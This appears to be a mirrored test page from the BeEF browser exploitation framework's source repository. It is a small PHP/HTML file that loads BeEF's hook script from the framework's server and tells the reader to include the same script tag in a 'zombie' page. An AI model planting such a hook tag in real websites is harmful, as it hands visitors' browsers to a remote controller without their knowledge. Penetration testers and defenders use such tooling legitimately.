mirror of
https://github.com/beefproject/beef
synced 2026-06-08 13:15:56 +00:00
03ffb4703d
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
24 lines
612 B
PHP
24 lines
612 B
PHP
<?
|
|
require_once("../include/config.inc.php");
|
|
?>
|
|
<html>
|
|
<head>
|
|
<title>BeEF Test Page</title>
|
|
<link rel="stylesheet" type="text/css" href="../css/firefox/style.css">
|
|
<link rel="icon" href="favicon.ico" type="image/x-icon">
|
|
</head>
|
|
<body>
|
|
<img src="../images/beef.gif" alt="BeEF"/>BeEF Test Page<br><br>
|
|
|
|
<script language='Javascript' src="<?=BEEF_DOMAIN?>hook/beefmagic.js.php"></script>
|
|
|
|
The following code needs to be included in the zombie:<br>
|
|
<code>
|
|
<script language='Javascript'
|
|
src="<?=BEEF_DOMAIN?>hook/beefmagic.js.php'></script>
|
|
</code>
|
|
<br>
|
|
|
|
</body>
|
|
</html>
|